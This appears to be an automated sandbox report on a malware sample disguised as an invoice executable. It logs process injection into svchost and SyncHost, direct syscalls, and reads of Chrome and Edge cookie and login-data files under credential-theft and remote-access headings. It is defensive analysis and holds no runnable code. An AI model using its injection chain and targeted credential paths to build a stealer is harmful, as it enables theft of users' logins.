Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353A9D0 mov eax, dword ptr fs:[00000030h] 1_2_0353A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035649D0 mov eax, dword ptr fs:[00000030h] 1_2_035649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FA9D3 mov eax, dword ptr fs:[00000030h] 1_2_035FA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C69C0 mov eax, dword ptr fs:[00000030h] 1_2_035C69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035629F9 mov eax, dword ptr fs:[00000030h] 1_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035629F9 mov eax, dword ptr fs:[00000030h] 1_2_035629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BE9E0 mov eax, dword ptr fs:[00000030h] 1_2_035BE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B89B3 mov esi, dword ptr fs:[00000030h] 1_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B89B3 mov eax, dword ptr fs:[00000030h] 1_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B89B3 mov eax, dword ptr fs:[00000030h] 1_2_035B89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0 mov eax, dword ptr fs:[00000030h] 1_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035309AD mov eax, dword ptr fs:[00000030h] 1_2_035309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035309AD mov eax, dword ptr fs:[00000030h] 1_2_035309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03560854 mov eax, dword ptr fs:[00000030h] 1_2_03560854
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03534859 mov eax, dword ptr fs:[00000030h] 1_2_03534859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03534859 mov eax, dword ptr fs:[00000030h] 1_2_03534859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03542840 mov ecx, dword ptr fs:[00000030h] 1_2_03542840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BE872 mov eax, dword ptr fs:[00000030h] 1_2_035BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BE872 mov eax, dword ptr fs:[00000030h] 1_2_035BE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C6870 mov eax, dword ptr fs:[00000030h] 1_2_035C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C6870 mov eax, dword ptr fs:[00000030h] 1_2_035C6870
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035BC810 mov eax, dword ptr fs:[00000030h] 1_2_035BC810
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03552835 mov eax, dword ptr fs:[00000030h] 1_2_03552835
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03552835 mov eax, dword ptr fs:[00000030h] 1_2_03552835
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_006180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 0_2_006180A9
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005EA155
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005EA124 SetUnhandledExceptionFilter, 0_2_005EA124

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtQuerySystemInformation: Direct from: 0x772748CC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtQueryVolumeInformationFile: Direct from: 0x77272F2C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtOpenSection: Direct from: 0x77272E0C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtClose: Direct from: 0x77272B6C
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtReadVirtualMemory: Direct from: 0x77272E8C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtCreateKey: Direct from: 0x77272C6C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtSetInformationThread: Direct from: 0x77272B4C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtQueryAttributesFile: Direct from: 0x77272E6C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtAllocateVirtualMemory: Direct from: 0x772748EC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtQueryInformationToken: Direct from: 0x77272CAC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtTerminateThread: Direct from: 0x77272FCC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtOpenKeyEx: Direct from: 0x77272B9C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtDeviceIoControlFile: Direct from: 0x77272AEC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtAllocateVirtualMemory: Direct from: 0x77272BEC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtProtectVirtualMemory: Direct from: 0x77267B2E Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtCreateFile: Direct from: 0x77272FEC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtOpenFile: Direct from: 0x77272DCC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtWriteVirtualMemory: Direct from: 0x77272E3C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtMapViewOfSection: Direct from: 0x77272D1C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtResumeThread: Direct from: 0x772736AC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtProtectVirtualMemory: Direct from: 0x77272F9C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtSetInformationProcess: Direct from: 0x77272C5C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtNotifyChangeKey: Direct from: 0x77273C2C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtCreateMutant: Direct from: 0x772735CC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtSetInformationThread: Direct from: 0x772663F9 Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtQueryInformationProcess: Direct from: 0x77272C26 Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtResumeThread: Direct from: 0x77272FBC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtCreateUserProcess: Direct from: 0x7727371C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtWriteVirtualMemory: Direct from: 0x7727490C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtAllocateVirtualMemory: Direct from: 0x77273C9C Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtAllocateVirtualMemory: Direct from: 0x77272BFC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtReadFile: Direct from: 0x77272ADC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtQuerySystemInformation: Direct from: 0x77272DFC Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe NtDelayExecution: Direct from: 0x77272DDC Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\SyncHost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: NULL target: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: NULL target: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Thread register set: target process: 8308 Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Thread APC queued: target process: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A25008 Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_006187B1 LogonUserW, 0_2_006187B1
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_005C3B3A
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_005C48D7
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00624C7F mouse_event, 0_2_00624C7F
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INVOICE #546 JPT.exe" Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe Process created: C:\Windows\SysWOW64\SyncHost.exe "C:\Windows\SysWOW64\SyncHost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00617CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00617CAF
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0061874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0061874B
Source: INVOICE #546 JPT.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ZjXK6gQah.exe, 00000004.00000002.2565222384.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000004.00000000.1768176062.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000008.00000002.2565347241.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: INVOICE #546 JPT.exe, ZjXK6gQah.exe, 00000004.00000002.2565222384.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000004.00000000.1768176062.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000008.00000002.2565347241.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: ZjXK6gQah.exe, 00000004.00000002.2565222384.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000004.00000000.1768176062.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000008.00000002.2565347241.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: ZjXK6gQah.exe, 00000004.00000002.2565222384.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000004.00000000.1768176062.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000008.00000002.2565347241.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005E862B cpuid 0_2_005E862B
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005F4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_005F4E87
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00601E06 GetUserNameW, 0_2_00601E06
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005F3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_005F3F3A
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_005C49A0
Source: INVOICE #546 JPT.exe, 00000000.00000002.1312812471.0000000001233000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mcupdate.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2564695686.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2564412584.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2564632613.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1843534772.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1843864079.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2567014493.0000000005880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1844293930.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2565572291.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: INVOICE #546 JPT.exe Binary or memory string: WIN_81
Source: INVOICE #546 JPT.exe Binary or memory string: WIN_XP
Source: INVOICE #546 JPT.exe Binary or memory string: WIN_XPe
Source: INVOICE #546 JPT.exe Binary or memory string: WIN_VISTA
Source: INVOICE #546 JPT.exe Binary or memory string: WIN_7
Source: INVOICE #546 JPT.exe Binary or memory string: WIN_8
Source: INVOICE #546 JPT.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

barindex
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2564695686.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2564412584.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2564632613.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1843534772.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1843864079.00000000033A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2567014493.0000000005880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1844293930.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2565572291.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00636283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00636283
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00636747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00636747
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs